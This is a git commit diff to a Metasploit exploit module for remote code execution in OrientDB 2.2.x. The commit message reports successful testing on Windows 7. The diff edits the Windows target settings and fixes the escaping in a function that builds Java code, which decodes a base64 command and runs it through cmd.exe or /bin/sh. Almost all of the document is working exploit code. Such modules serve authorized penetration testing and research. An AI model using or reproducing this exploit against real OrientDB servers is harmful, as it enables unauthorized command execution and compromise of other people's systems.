Orientdb 2.2.x RCE - Changed the java_craft_runtime_exec function; Tested the module against Win7-Pro-x64 with OrientDB v2.2.20 with StagerCmd flavors vbs and certutil with success
Ricardo Almeida
parent
219987726f
commit
f3f96babb9
|
|
@ -34,8 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
[
|
||||
['Linux', {'Arch' => ARCH_X86, 'Platform' => 'linux' }],
|
||||
['Unix CMD', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}],
|
||||
# WARNING: Not tested against Windows
|
||||
['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win', 'CmdStagerFlavor' => ['debug_asm','debug_write','vbs','certutil']}]
|
||||
['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win', 'CmdStagerFlavor' => ['vbs','certutil']}]
|
||||
],
|
||||
'DisclosureDate' => 'Jul 13 2017',
|
||||
'DefaultTarget' => 0))
|
||||
|
|
@ -132,18 +131,18 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
decoder = Rex::Text.rand_text_alpha(5, 8)
|
||||
decoded_bytes = Rex::Text.rand_text_alpha(5, 8)
|
||||
cmd_array = Rex::Text.rand_text_alpha(5, 8)
|
||||
jcode = "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\\n"
|
||||
jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\\\"#{Rex::Text.encode_base64(cmd)}\\\");\\n"
|
||||
jcode << "String [] #{cmd_array} = new String[3];\\n"
|
||||
jcode = "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n"
|
||||
jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n"
|
||||
jcode << "String [] #{cmd_array} = new String[3];\n"
|
||||
if target['Platform'] == 'win'
|
||||
jcode << "#{cmd_array}[0] = \\\"cmd.exe\\\";\\n"
|
||||
jcode << "#{cmd_array}[1] = \\\"/c\\\";\\n"
|
||||
jcode << "#{cmd_array}[0] = \"cmd.exe\";\n"
|
||||
jcode << "#{cmd_array}[1] = \"/c\";\n"
|
||||
else
|
||||
jcode << "#{cmd_array}[0] = \\\"/bin/sh\\\";\\n"
|
||||
jcode << "#{cmd_array}[1] = \\\"-c\\\";\\n"
|
||||
jcode << "#{cmd_array}[0] = \"/bin/sh\";\n"
|
||||
jcode << "#{cmd_array}[1] = \"-c\";\n"
|
||||
end
|
||||
jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \\\"UTF-8\\\");\\n"
|
||||
jcode << "Runtime.getRuntime().exec(#{cmd_array});"
|
||||
jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n"
|
||||
jcode << "Runtime.getRuntime().exec(#{cmd_array});\n"
|
||||
jcode
|
||||
end
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue